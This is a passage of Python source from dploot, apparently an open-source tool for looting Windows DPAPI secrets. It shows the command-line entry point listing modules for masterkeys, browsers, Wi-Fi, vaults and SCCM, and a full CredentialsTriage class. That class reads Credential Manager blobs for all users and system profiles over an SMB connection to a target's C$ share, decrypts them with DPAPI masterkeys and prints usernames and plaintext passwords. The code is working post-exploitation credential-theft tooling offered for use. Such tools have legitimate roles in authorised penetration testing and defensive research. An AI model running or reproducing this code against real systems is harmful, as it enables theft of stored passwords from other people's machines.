    masterkeys,
    mobaxterm,
    rdg,
    sccm,
    triage,
    vaults,
    wam,
    wifi,
)

ENTRY_PARSERS = [
    backupkey,
    blob,
    browser,
    certificates,
    cng,
    credentials,
    machinecertificates,
    machinecng,
    machinecredentials,
    machinemasterkeys,
    machinetriage,
    machinevaults,
    masterkeys,
    mobaxterm,
    rdg,
    sccm,
    triage,
    vaults,
    wam,
    wifi,
]


def main() -> None:
    logger.init()
    version = importlib.metadata.version("dploot")
    print(f"dploot (https://github.com/zblurx/dploot) v{version} by @_zblurx")
    parser = argparse.ArgumentParser(
        description="DPAPI looting locally remotely in Python",
        add_help=True,
    )

    subparsers = parser.add_subparsers(help="Action", dest="action", required=True)

    actions = {}

    for entry_parser in ENTRY_PARSERS:
        action, entry = entry_parser.add_subparser(subparsers)
        actions[action] = entry

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    elif options.quiet is True:
        logging.getLogger().setLevel(logging.CRITICAL)
    else:
        logging.getLogger().setLevel(logging.INFO)

    logging.debug(f"{options=}")
    try:
        actions[options.action](options)
    except Exception as e:
        logging.error("Got error: %s" % e)
        if options.debug:
            traceback.print_exc()
        else:
            logging.error("Use -debug to print a stacktrace")


if __name__ == "__main__":
    main()



import logging
import ntpath
from typing import Any, List, Callable
from dataclasses import dataclass

from impacket.dpapi import CREDENTIAL_BLOB


from dploot.triage import Triage
from dploot.lib.dpapi import decrypt_credential, find_masterkey_for_credential_blob
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.lib.utils import is_credfile
from dploot.triage.masterkeys import Masterkey


@dataclass
class Credential:
    winuser: str
    credblob: "CREDENTIAL_BLOB | Any"
    target: str
    description: str
    unknown: str
    username: str
    password: str

    def dump(self) -> None:
        self.credblob.dump()

    def dump_quiet(self) -> None:
        print(f"[CREDENTIAL] {self.target} - {self.username}:{self.password}")


class CredentialsTriage(Triage):
    user_credentials_generic_path = [
        "Users\\%s\\AppData\\Local\\Microsoft\\Credentials",
        "Users\\%s\\AppData\\Roaming\\Microsoft\\Credentials",
    ]

    system_credentials_generic_path = [
        "Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials",
        "Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Credentials",
        "Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Microsoft\\Credentials",
        "Windows\\ServiceProfiles\\LocalService\\AppData\\Roaming\\Microsoft\\Credentials",
        "Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Microsoft\\Credentials",
        "Windows\\ServiceProfiles\\NetworkService\\AppData\\Roaming\\Microsoft\\Credentials",
    ]
    share = "C$"

    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_credential_callback: Callable = None,
        false_positive: List[str] | None = None,
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_credential_callback, 
            false_positive=false_positive
        )
        self._users = None

    def triage_system_credentials(self) -> List[Credential]:
        credentials = []
        credential_dirs = self.conn.listDirs(
            self.share, self.system_credentials_generic_path
        )
        for system_credential_path, system_credential_dir in credential_dirs.items():
            if system_credential_dir is not None:
                credentials += self.triage_credentials_folder(
                    credential_folder_path=system_credential_path,
                    credential_folder=system_credential_dir,
                    winuser="SYSTEM",
                )
        return credentials

    def triage_credentials(self) -> List[Credential]:
        credentials = []
        for user in self.users:
            try:
                credentials += self.triage_credentials_for_user(user)
            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback

                    traceback.print_exc()
                    logging.debug(str(e))
        return credentials

    def triage_credentials_for_user(self, user: str) -> List[Credential]:
        credentials = []
        credential_dirs = self.conn.listDirs(
            self.share, [elem % user for elem in self.user_credentials_generic_path]
        )
        for user_credential_path, user_credential_dir in credential_dirs.items():
            if user_credential_dir is not None:
                credentials += self.triage_credentials_folder(
                    credential_folder_path=user_credential_path,
                    credential_folder=user_credential_dir,
                    winuser=user,
                )
        return credentials

    def triage_credentials_folder(
        self, credential_folder_path, credential_folder, winuser: str
    ) -> List[Credential]:
        credentials = []
        for d in credential_folder:
            if is_credfile(d.get_longname()):
                cred_filename = d.get_longname()
                cred_filename_path = ntpath.join(credential_folder_path, cred_filename)
                logging.debug(
                    f"Found Credential Manager blob: \\\\{self.target.address}\\{self.share}\\{cred_filename_path}"
                )
                # read credman blob
                credmanblob_bytes = self.conn.readFile(self.share, cred_filename_path, looted_files=self.looted_files)
                if credmanblob_bytes is not None and self.masterkeys is not None:
                    masterkey = find_masterkey_for_credential_blob(
                        credmanblob_bytes, self.masterkeys
                    )
                    if masterkey is not None:
                        cred = decrypt_credential(credmanblob_bytes, masterkey)
                        credential = None
                        if cred["Unknown3"] != b"":
                            try:
                                credential = Credential(
                                    winuser=winuser,
                                    credblob=cred,
                                    target=cred["Target"].decode("utf-16le").rstrip("\0"),
                                    description=cred["Description"].decode("utf-16le").rstrip("\0"),
                                    unknown=cred["Unknown"].decode("utf-16le").rstrip("\0"),
                                    username=cred["Username"].decode("utf-16le").rstrip("\0"),
                                    password=cred["Unknown3"].decode("utf-16le").rstrip("\0"),
                                )
                            except UnicodeDecodeError:
                                credential = Credential(
                                    winuser=winuser,
                                    credblob=cred,
                                    target=cred["Target"].decode("utf-16le").rstrip("\0"),
                                    description=cred["Description"].decode("utf-16le").rstrip("\0"),
                                    unknown=cred["Unknown"].decode("utf-16le").rstrip("\0"),
                                    username=cred["Username"].decode("utf-16le").rstrip("\0"),
                                    password=cred["Unknown3"].decode("latin-1").rstrip("\0"),
                                )
                            credentials.append(credential)
                            if self.per_loot_callback is not None:
                                self.per_loot_callback(credential)
                    else:
                        logging.debug("Could not decrypt...")
        return credentials

    @property
    def users(self) -> List[str]:
        if self._users is not None:
            return self._users

        self._users = self.conn.list_users(self.share)

        return self._users
